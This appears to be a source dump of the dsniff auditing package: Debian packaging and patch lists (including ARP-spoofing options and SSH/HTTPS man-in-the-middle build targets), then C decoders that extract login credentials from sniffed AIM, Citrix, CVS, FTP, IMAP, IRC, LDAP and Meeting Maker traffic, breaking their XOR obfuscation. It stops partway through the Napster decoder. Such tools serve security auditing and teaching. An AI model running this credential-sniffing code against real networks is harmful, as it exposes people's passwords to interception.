libmissing.a 29 | - $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 30 | + $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) -ltirpc 31 | 32 | macof: macof.o libmissing.a 33 | $(CC) $(LDFLAGS) -o $@ macof.o $(LIBS) $(PCAPLIB) $(LNETLIB) 34 | @@ -128,7 +128,7 @@ 35 | $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 36 | 37 | sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o libmissing.a 38 | - $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 39 | + $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) -ltirpc 40 | 41 | sshow: sshow.o pcaputil.o libmissing.a 42 | $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 43 | @@ -146,7 +146,7 @@ 44 | $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 45 | 46 | webmitm: webmitm.o base64.o buf.o decode_http.o record.o libmissing.a 47 | - $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 48 | + $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) -ltirpc 49 | 50 | webspy: webspy.o base64.o buf.o remote.o libmissing.a 51 | $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) 52 | -------------------------------------------------------------------------------- /debian/patches/series: -------------------------------------------------------------------------------- 1 | 01_time.h.patch 2 | 02_mailsnarf_corrupt.patch 3 | 03_pcap_read_dump.patch 4 | 04_multiple_intf.patch 5 | 05_amd64_fix.patch 6 | 06_urlsnarf_zeropad.patch 7 | 07_libnet_1.1.patch 8 | 08_openssl-0.9.8.patch 9 | 09_sysconf_clocks.patch 10 | 10_urlsnarf_escape.patch 11 | 11_string_header.patch 12 | 12_arpa_inet_header.patch 13 | 13_pop_with_version.patch 14 | 14_obsolete_time.patch 15 | 15_checksum_libnids.patch 16 | 16_TDS_decoder.patch 17 | 17_checksum.patch 18 | 18_sshcrypto.patch 19 | 19_rewrite-and-modernize-POP-decoder.patch 20 | 20_debian_dirs.patch 21 | 21_msgsnarf_segfault.patch 22 | 22_handlepp.patch 23 | 23_urlsnarf_timestamp.patch 24 | 24_Fix-OpenSSL1.1.0-Build.patch 25 | 25_fix-spelling-errors.patch 26 | 26_arpspoof-add-r-switch-to-poison-both-directions.patch 27 | 27_arpspoof-allow-use-of-of-multiple-targets.patch 28 | 28_arpspoof-allow-selection-of-source-hw-address.patch 29 | 29_libnet_name2addr4.patch 30 | 30_pntohl_shift.patch 31 | 31_sysconf_clocks.patch 32 | 32_rpc_segfault.patch 33 | 33_sshcrypto_DES.patch 34 | 34_fix-parallel-FTBFS.patch 35 | 35_Add_CPPFLAGS.patch 36 | 36_implicit_declarations.patch 37 | 37_fix-lib-and-share-dirs.patch 38 | 38_fix-pcap_init.patch 39 | 39_libtirpc.patch 40 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | export DEB_BUILD_MAINT_OPTIONS = hardening=+all 4 | export DEB_CFLAGS_MAINT_APPEND = -I/usr/include/tirpc/ 5 | export DEB_LDFLAGS_MAINT_APPEND = -ltirpc 6 | %: 7 | dh $@ 8 | 9 | override_dh_auto_install: 10 | # prefix is hardcoded in Makefile.in 11 | dh_auto_install -- prefix=debian/dsniff/usr 12 | -------------------------------------------------------------------------------- /debian/salsa-ci.yml: -------------------------------------------------------------------------------- 1 | --- 2 | include: 3 | - https://salsa.debian.org/salsa-ci-team/pipeline/raw/master/salsa-ci.yml 4 | - https://salsa.debian.org/salsa-ci-team/pipeline/raw/master/pipeline-jobs.yml 5 | -------------------------------------------------------------------------------- /debian/source/format: -------------------------------------------------------------------------------- 1 | 3.0 (quilt) 2 | -------------------------------------------------------------------------------- /debian/watch: -------------------------------------------------------------------------------- 1 | version=4 2 | opts="dversionmangle=s/.debian//" \ 3 | https://www.monkey.org/~dugsong/dsniff/beta/dsniff-(.+)\.tar\.gz 4 | 5 | 6 | -------------------------------------------------------------------------------- /decode_aim.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_aim.c 3 | * 4 | * AOL Instant Messenger (and ICQ2000). 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_aim.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "hex.h" 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | struct flap { 24 | u_char start; 25 | u_char channel; 26 | u_short seqnum; 27 | u_short datalen; 28 | }; 29 | 30 | static char *aim_xor1 = "Tic/Toc"; 31 | 32 | static u_char aim_xor2[] = { 33 | 0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 34 | 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c 35 | }; 36 | 37 | int 38 | decode_aim(u_char *buf, int len, u_char *obuf, int olen) 39 | { 40 | struct buf *msg, inbuf, outbuf; 41 | struct flap *flap; 42 | u_char c, *p; 43 | int i, j; 44 | 45 | buf_init(&inbuf, buf, len); 46 | buf_init(&outbuf, obuf, olen); 47 | 48 | if (buf_cmp(&inbuf, "FLAPON\r\n\r\n", 10) == 0) 49 | buf_skip(&inbuf, 10); 50 | 51 | while (buf_len(&inbuf) > sizeof(*flap)) { 52 | flap = (struct flap *)buf_ptr(&inbuf); 53 | flap->datalen = ntohs(flap->datalen); 54 | 55 | i = sizeof(*flap) + flap->datalen; 56 | 57 | if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) 58 | break; 59 | 60 | buf_skip(msg, sizeof(*flap)); 61 | 62 | if (buf_cmp(msg, "toc_signon ", 11) == 0) { 63 | msg->base[msg->end - 1] = '\0'; 64 | p = buf_ptr(msg); 65 | 66 | for (i = 0; i < 4; i++) { 67 | if ((j = strcspn(p, " ")) > 0) 68 | p += (j + 1); 69 | } 70 | if (strtok(p, " ") == NULL) 71 | continue; 72 | 73 | buf_putf(&outbuf, "%s ", buf_ptr(msg)); 74 | 75 | i = strlen(p); 76 | j = hex_decode(p, i, p, i); 77 | 78 | for (i = 0; i < j; i++) 79 | p[i] = p[i] ^ aim_xor1[i % 7]; 80 | p[i] = '\0'; 81 | 82 | buf_putf(&outbuf, "[%s]\n", p); 83 | } 84 | else if (flap->start == 0x2a && flap->channel == 0x01 && 85 | buf_cmp(msg, "\x00\x00\x00\x01", 4) == 0) { 86 | buf_skip(msg, 7); 87 | 88 | buf_get(msg, &c, 1); 89 | p = buf_ptr(msg); 90 | 91 | if (c == 0 || buf_skip(msg, c + 3) < 0) 92 | continue; 93 | 94 | p[c] = '\0'; 95 | 96 | buf_get(msg, &c, 1); 97 | 98 | if (buf_len(msg) < c + 1) 99 | continue; 100 | 101 | buf_putf(&outbuf, "%s\n", p); 102 | 103 | p = buf_ptr(msg); 104 | 105 | for (i = 0; i < c; i++) { 106 | p[i] = p[i] ^ aim_xor2[i % sizeof(aim_xor2)]; 107 | } 108 | p[i] = '\0'; 109 | 110 | buf_putf(&outbuf, "%s\n", p); 111 | 112 | break; 113 | } 114 | } 115 | buf_end(&outbuf); 116 | 117 | return (buf_len(&outbuf)); 118 | } 119 | -------------------------------------------------------------------------------- /decode_citrix.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_citrix.c 3 | * 4 | * Citrix ICA. 5 | * 6 | * http://www.securityfocus.com/templates/archive.pike?list=1&date=200 \ 7 | * 0-04-15&msg=Pine.BSO.4.20.0003290949280.2640-100000@naughty.monkey.org 8 | * 9 | * Thanks to Jeremie Kass for providing me with 10 | * traffic traces. 11 | * 12 | * Copyright (c) 2000 Dug Song 13 | * 14 | * $Id: decode_citrix.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 15 | */ 16 | 17 | #include "config.h" 18 | 19 | #include 20 | 21 | #include 22 | #include 23 | 24 | #include "buf.h" 25 | #include "decode.h" 26 | 27 | static u_char ica_magic[] = { 0x32, 0x26, 0x85, 0x92, 0x58 }; 28 | 29 | int 30 | decode_citrix(u_char *buf, int len, u_char *obuf, int olen) 31 | { 32 | struct buf inbuf, outbuf; 33 | u_char key, c, t[2]; 34 | int i; 35 | 36 | buf_init(&inbuf, buf, len); 37 | buf_init(&outbuf, obuf, olen); 38 | 39 | while ((i = buf_index(&inbuf, ica_magic, sizeof(ica_magic))) >= 0) { 40 | buf_skip(&inbuf, i); 41 | 42 | if (buf_len(&inbuf) < 60) 43 | break; 44 | 45 | buf_skip(&inbuf, 17); 46 | 47 | if (buf_get(&inbuf, &key, 1) != 1) 48 | break; 49 | 50 | buf_skip(&inbuf, 42); 51 | 52 | if (buf_get(&inbuf, &c, 1) != 1) 53 | break; 54 | 55 | c ^= ('C' | key); 56 | 57 | buf_put(&outbuf, &c, 1); 58 | 59 | i = 0; 60 | while (buf_get(&inbuf, t, 2) == 2) { 61 | c = t[0] ^ t[1] ^ key; 62 | 63 | if (c == '\0') { 64 | buf_put(&outbuf, "\n", 1); 65 | if (++i > 2) break; 66 | } 67 | buf_put(&outbuf, &c, 1); 68 | } 69 | } 70 | buf_end(&outbuf); 71 | 72 | return (buf_len(&outbuf)); 73 | } 74 | -------------------------------------------------------------------------------- /decode_cvs.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_cvs.c 3 | * 4 | * Concurrent Versions System. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_cvs.c,v 1.6 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include "buf.h" 18 | #include "decode.h" 19 | 20 | /* stolen from CVS scramble.c */ 21 | static u_char cvs_shifts[] = { 22 | 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 23 | 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 24 | 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 25 | 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 26 | 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 27 | 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 28 | 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 29 | 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 30 | 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 31 | 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 32 | 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 33 | 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 34 | 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 35 | 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 36 | 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 37 | 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 38 | }; 39 | 40 | int 41 | decode_cvs(u_char *buf, int len, u_char *obuf, int olen) 42 | { 43 | struct buf *line, inbuf, outbuf; 44 | u_char *p; 45 | int i, n; 46 | 47 | buf_init(&inbuf, buf, len); 48 | buf_init(&outbuf, obuf, olen); 49 | 50 | if (buf_cmp(&inbuf, "BEGIN ", 6) != 0) 51 | return (0); 52 | 53 | for (n = 0; n < 5 && (i = buf_index(&inbuf, "\n", 1)) != -1; n++) { 54 | line = buf_tok(&inbuf, NULL, i + 1); 55 | line->base[line->end - 1] = '\0'; 56 | 57 | p = buf_ptr(line); 58 | buf_putf(&outbuf, "%s", p); 59 | 60 | if (n == 3) { 61 | if (p[0] != 'A') 62 | return (0); 63 | 64 | for (i = 1; i < sizeof(cvs_shifts) - 1 && p[i]; i++) 65 | p[i] = cvs_shifts[p[i]]; 66 | 67 | buf_putf(&outbuf, " [%s]", p + 1); 68 | } 69 | buf_put(&outbuf, "\n", 1); 70 | } 71 | buf_end(&outbuf); 72 | 73 | return (buf_len(&outbuf)); 74 | } 75 | 76 | -------------------------------------------------------------------------------- /decode_ftp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ftp.c 3 | * 4 | * File Transfer Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ftp.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "options.h" 19 | #include "buf.h" 20 | #include "decode.h" 21 | 22 | extern struct _dc_meta dc_meta; 23 | 24 | int 25 | decode_ftp(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | struct buf *line, inbuf, outbuf; 28 | int i, n; 29 | 30 | if ((len = strip_telopts(buf, len)) == 0) 31 | return (0); 32 | 33 | buf_init(&inbuf, buf, len); 34 | buf_init(&outbuf, obuf, olen); 35 | 36 | if (!buf_isascii(&inbuf)) 37 | return (0); 38 | 39 | n = 0; 40 | 41 | while ((i = buf_index(&inbuf, "\n", 1)) != -1) { 42 | line = buf_tok(&inbuf, NULL, i); 43 | buf_skip(&inbuf, 1); 44 | 45 | if (i > 0 && line->base[i - 1] == '\r') 46 | line->end--; 47 | line->base[line->end] = '\0'; 48 | 49 | if (strncasecmp(buf_ptr(line), "USER ", 5) == 0 || 50 | strncasecmp(buf_ptr(line), "ACCT ", 5) == 0 || 51 | strncasecmp(buf_ptr(line), "PASS ", 5) == 0) { 52 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 53 | dc_meta.is_hot = 1; 54 | n++; 55 | } 56 | } 57 | if (n < 2) return (0); 58 | 59 | buf_end(&outbuf); 60 | 61 | return (buf_len(&outbuf)); 62 | } 63 | 64 | -------------------------------------------------------------------------------- /decode_hex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_hex.c 3 | * 4 | * Hex dump, for debugging. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_hex.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ 24 | 25 | int 26 | decode_hex(u_char *buf, int len, u_char *obuf, int olen) 27 | { 28 | struct buf inbuf, outbuf; 29 | u_int i, j, k; 30 | u_char c; 31 | 32 | buf_init(&inbuf, buf, len); 33 | buf_init(&outbuf, obuf, olen); 34 | 35 | while ((i = buf_len(&inbuf)) > 0) { 36 | i = i < 16 ? i : 16; 37 | k = buf_tell(&inbuf); 38 | 39 | buf_putf(&outbuf, " %04x: ", k); 40 | 41 | for (j = 0; j < i; j++) { 42 | buf_get(&inbuf, &c, 1); 43 | buf_putf(&outbuf, "%02x", (u_int)c); 44 | if ((j % 2) == 1) 45 | buf_put(&outbuf, " ", 1); 46 | } 47 | for (; j < 16; j++) { 48 | buf_put(&outbuf, " ", (j % 2) + 2); 49 | } 50 | buf_put(&outbuf, " ", 1); 51 | 52 | buf_seek(&inbuf, k, SEEK_SET); 53 | 54 | for (j = 0; j < i; j++) { 55 | buf_get(&inbuf, &c, 1); 56 | c = isprint(c) ? c : '.'; 57 | buf_putf(&outbuf, "%c", c); 58 | } 59 | buf_put(&outbuf, "\n", 1); 60 | } 61 | buf_end(&outbuf); 62 | 63 | return (buf_len(&outbuf)); 64 | } 65 | -------------------------------------------------------------------------------- /decode_imap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_imap.c 3 | * 4 | * Internet Mail Access Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_imap.c,v 1.5 2001/03/15 08:33:00 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "base64.h" 19 | #include "decode.h" 20 | #include "buf.h" 21 | 22 | extern struct _dc_meta dc_meta; 23 | 24 | int 25 | decode_imap(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | char *p; 28 | char *ptr; 29 | int need_more = 0; 30 | enum { 31 | NONE, 32 | AUTHPLAIN, 33 | AUTHMULTI, 34 | USERPASS 35 | } mode = NONE; 36 | 37 | obuf[0] = '\0'; 38 | 39 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 40 | if (need_more == 0) { 41 | // skip ID 42 | if ((ptr = strchr(p, ' ')) == NULL) 43 | break; 44 | p = ++ptr; 45 | } 46 | 47 | if (mode == NONE) { 48 | if (strncasecmp(p, "AUTHENTICATE PLAIN", 18) == 0) { 49 | mode = AUTHPLAIN; 50 | need_more = 1; 51 | continue; 52 | } else if ((strncasecmp(p, "AUTHENTICATE ", 13) == 0) || (strncasecmp(p, "LOGIN {", 7) == 0)) { 53 | strlcat(obuf, p, olen); 54 | mode = AUTHMULTI; 55 | need_more = 2; 56 | continue; 57 | } else if (strncasecmp(p, "LOGIN ", 6) == 0) { 58 | mode = USERPASS; // FALL-THROUGH. 59 | } else 60 | continue; 61 | } 62 | 63 | if (mode == USERPASS) { 64 | snprintf(obuf, olen, "%s\n", p + 6 /* 'LOGIN '*/); 65 | break; 66 | } 67 | 68 | if (mode == AUTHPLAIN) { 69 | char *u , *pass; 70 | if (decode_authplain(p, &u, &pass) != 0) 71 | break; 72 | snprintf(obuf, olen, "%s %s\n", u, pass); 73 | break; 74 | } 75 | 76 | if (need_more > 0) { 77 | need_more--; 78 | strlcat(obuf, p, olen); 79 | if (need_more > 0) 80 | continue; 81 | strlcat(obuf, "\n", olen); 82 | break; 83 | } 84 | break; 85 | } 86 | 87 | if (obuf[0] == '\0') 88 | return 0; 89 | 90 | dc_meta.is_hot = 1; 91 | return (strlen(obuf)); 92 | } 93 | -------------------------------------------------------------------------------- /decode_irc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_irc.c 3 | * 4 | * Internet Relay Chat. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_irc.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_irc(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | struct buf *line, inbuf, outbuf; 25 | int i, got_auth; 26 | 27 | buf_init(&inbuf, buf, len); 28 | buf_init(&outbuf, obuf, olen); 29 | got_auth = 0; 30 | 31 | while ((i = buf_index(&inbuf, "\n", 1)) != -1) { 32 | line = buf_tok(&inbuf, NULL, i); 33 | buf_skip(&inbuf, 1); 34 | 35 | if (i > 0 && line->base[i - 1] == '\r') 36 | line->end--; 37 | line->base[line->end] = '\0'; 38 | 39 | if (buf_cmp(&inbuf, ";", 1) == 0) { 40 | if ((i = buf_index(line, " ", 1)) < 0) 41 | continue; 42 | buf_skip(line, i + 1); 43 | } 44 | if (buf_cmp(line, "USER ", 5) == 0 || 45 | buf_cmp(line, "NICK ", 5) == 0) { 46 | buf_rewind(line); 47 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 48 | } 49 | else if (buf_cmp(line, "PASS ", 5) == 0 || 50 | buf_cmp(line, "OPER ", 5) == 0) { 51 | buf_rewind(line); 52 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 53 | got_auth = 1; 54 | } 55 | else if (buf_cmp(line, "MODE ", 5) == 0 && 56 | buf_index(line, " +k ", 4) != -1) { 57 | buf_rewind(line); 58 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 59 | got_auth = 1; 60 | } 61 | else if (buf_cmp(line, "JOIN ", 5) == 0) { 62 | buf_skip(line, 5); 63 | if ((i = buf_index(line, " ", 1)) < 0) 64 | continue; 65 | buf_skip(line, i + 1); 66 | if (buf_len(line) < 1) 67 | continue; 68 | buf_rewind(line); 69 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 70 | got_auth = 1; 71 | } 72 | } 73 | buf_end(&outbuf); 74 | 75 | return (got_auth ? buf_len(&outbuf) : 0); 76 | } 77 | -------------------------------------------------------------------------------- /decode_ldap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ldap.c 3 | * 4 | * Lightweight Directory Access Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ldap.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "asn1.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_ldap(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | struct buf *msg, inbuf, outbuf; 26 | int i, type; 27 | u_char *p; 28 | 29 | buf_init(&inbuf, buf, len); 30 | buf_init(&outbuf, obuf, olen); 31 | 32 | while (buf_len(&inbuf) > 10) { 33 | /* LDAPMessage */ 34 | type = asn1_type(&inbuf); 35 | i = asn1_len(&inbuf); 36 | 37 | if (i <= 0 || (msg = buf_tok(&inbuf, NULL, i)) == NULL) 38 | break; 39 | 40 | if (type != ASN1_SEQUENCE) 41 | continue; 42 | 43 | /* messageID */ 44 | type = asn1_type(msg); 45 | i = asn1_len(msg); 46 | if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) 47 | continue; 48 | 49 | /* bindRequest op - APPLICATION[0] SEQUENCE */ 50 | if (buf_cmp(msg, "\x60", 1) != 0) 51 | continue; 52 | asn1_type(msg); 53 | asn1_len(msg); 54 | 55 | /* version */ 56 | type = asn1_type(msg); 57 | i = asn1_len(msg); 58 | if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) 59 | continue; 60 | 61 | /* name */ 62 | type = asn1_type(msg); 63 | i = asn1_len(msg); 64 | p = buf_ptr(msg); 65 | if (type != ASN1_STRING || i <= 0 || buf_skip(msg, i) < 0) 66 | continue; 67 | 68 | /* simple auth [0] */ 69 | if (buf_cmp(msg, "\x80", 1) != 0) 70 | continue; 71 | *(buf_ptr(msg)) = '\0'; 72 | buf_skip(msg, 1); 73 | 74 | /* passwd */ 75 | i = asn1_len(msg); 76 | 77 | if (i <= 0 || i > buf_len(msg)) 78 | continue; 79 | 80 | if (buf_tell(&outbuf) > 0) 81 | buf_put(&outbuf, "\n", 1); 82 | buf_putf(&outbuf, "%s\n", p); 83 | buf_put(&outbuf, buf_ptr(msg), i); 84 | buf_put(&outbuf, "\n", 1); 85 | } 86 | buf_end(&outbuf); 87 | 88 | return (buf_len(&outbuf)); 89 | } 90 | 91 | -------------------------------------------------------------------------------- /decode_mmxp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_mmxp.c 3 | * 4 | * Meeting Maker. 5 | * 6 | * Thanks for Matt Power for his BUGTRAQ post 7 | * on Meeting Maker encryption, and for providing me with traffic traces. 8 | * 9 | * The encryption algorithm seems to be much simpler than what Matt 10 | * reversed - see below... 11 | * 12 | * Copyright (c) 2000 Dug Song 13 | * 14 | * $Id: decode_mmxp.c,v 1.8 2001/03/15 08:33:01 dugsong Exp $ 15 | */ 16 | 17 | #include "config.h" 18 | 19 | #include 20 | #include 21 | 22 | #include 23 | #include 24 | #include 25 | 26 | #include "buf.h" 27 | #include "decode.h" 28 | 29 | #define MM_SECRET "Thisisastupidwasteoftimeandspace" 30 | 31 | static u_char *mm_xor = MM_SECRET; 32 | 33 | int 34 | decode_mmxp(u_char *buf, int len, u_char *obuf, int olen) 35 | { 36 | struct buf inbuf, outbuf; 37 | u_char *p, c; 38 | u_int32_t i; 39 | int encrypt; 40 | 41 | buf_init(&inbuf, buf, len); 42 | buf_init(&outbuf, obuf, len); 43 | 44 | while ((i = buf_index(&inbuf, "\x00\x00\x24\x55", 4)) != -1) { 45 | buf_skip(&inbuf, i + 4); 46 | 47 | if (buf_cmp(&inbuf, "\x7f\xff", 2) == 0) 48 | encrypt = 1; 49 | else if (buf_cmp(&inbuf, "\xff\xff", 2) == 0) 50 | encrypt = 0; 51 | else continue; 52 | 53 | buf_skip(&inbuf, 4); 54 | 55 | /* LPPPg? */ 56 | if (buf_get(&inbuf, &i, sizeof(i)) < 0) 57 | break; 58 | 59 | i = ntohl(i); 60 | if (buf_skip(&inbuf, i + 4 + 4) < 0) 61 | continue; 62 | 63 | /* Server. */ 64 | if (buf_get(&inbuf, &c, 1) != 1) break; 65 | if (buf_len(&inbuf) < c) break; 66 | 67 | buf_put(&outbuf, buf_ptr(&inbuf), c); 68 | buf_put(&outbuf, "\n", 1); 69 | buf_skip(&inbuf, c + 4); 70 | 71 | /* Username. */ 72 | if (buf_get(&inbuf, &c, 1) != 1) break; 73 | if (buf_len(&inbuf) < c) break; 74 | 75 | buf_put(&outbuf, buf_ptr(&inbuf), c); 76 | buf_put(&outbuf, "\n", 1); 77 | buf_skip(&inbuf, c + 4); 78 | 79 | /* Password. */ 80 | if (buf_get(&inbuf, &c, 1) != 1) break; 81 | if (buf_len(&inbuf) < c) break; 82 | 83 | p = buf_ptr(&inbuf); 84 | 85 | if (encrypt) { 86 | for (i = 0; i < c; i++) 87 | p[i] ^= mm_xor[i % (sizeof(MM_SECRET) - 1)]; 88 | } 89 | buf_put(&outbuf, p, c); 90 | buf_put(&outbuf, "\n", 1); 91 | } 92 | buf_end(&outbuf); 93 | 94 | return (buf_len(&outbuf)); 95 | } 96 | 97 | -------------------------------------------------------------------------------- /decode_mountd.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_mountd.c 3 | * 4 | * RPC mountd. 5 | * 6 | * Outputs filehandle in nfsshell format. :-) 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_mountd.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | #include "buf.h" 24 | #include "mount.h" 25 | #include "rpc.h" 26 | #include "decode.h" 27 | 28 | int 29 | decode_mountd(u_char *buf, int len, u_char *obuf, int olen) 30 | { 31 | XDR xdrs; 32 | struct buf outbuf; 33 | struct rpc_msg msg; 34 | struct xid_map *xm; 35 | struct fhstatus fhstat; 36 | char *p, *dir; 37 | int i, hdrlen; 38 | 39 | buf_init(&outbuf, obuf, olen); 40 | 41 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 42 | return (0); 43 | 44 | if (msg.rm_direction == CALL && 45 | msg.rm_call.cb_prog == MOUNTPROG && 46 | msg.rm_call.cb_proc == MOUNTPROC_MNT) { 47 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 48 | dir = NULL; 49 | if (xdr_string(&xdrs, &dir, MAXPATHLEN)) { 50 | xid_map_enter(msg.rm_xid, MOUNTPROG, MOUNTVERS, 51 | MOUNTPROC_MNT, (void *) dir); 52 | } 53 | xdr_destroy(&xdrs); 54 | } 55 | else if (msg.rm_direction == REPLY && 56 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 57 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 58 | msg.acpted_rply.ar_stat == SUCCESS) { 59 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 60 | XDR_DECODE); 61 | if (xdr_fhstatus(&xdrs, &fhstat)) { 62 | if (fhstat.fhs_status == 0) { 63 | buf_putf(&outbuf, "%s [", 64 | (char *)xm->data); 65 | 66 | p = fhstat.fhstatus_u.fhs_fhandle; 67 | 68 | for (i = 0; i < FHSIZE; i++) { 69 | buf_putf(&outbuf, "%.2x ", 70 | p[i] & 0xff); 71 | } 72 | buf_put(&outbuf, "]\n", 2); 73 | } 74 | } 75 | xdr_destroy(&xdrs); 76 | } 77 | free(xm->data); 78 | memset(xm, 0, sizeof(*xm)); 79 | } 80 | buf_end(&outbuf); 81 | 82 | return (buf_len(&outbuf)); 83 | } 84 | -------------------------------------------------------------------------------- /decode_napster.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_napster.c 3 | * 4 | * Napster. w00w00! 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_napster.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_napster(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | struct buf inbuf, outbuf; 25 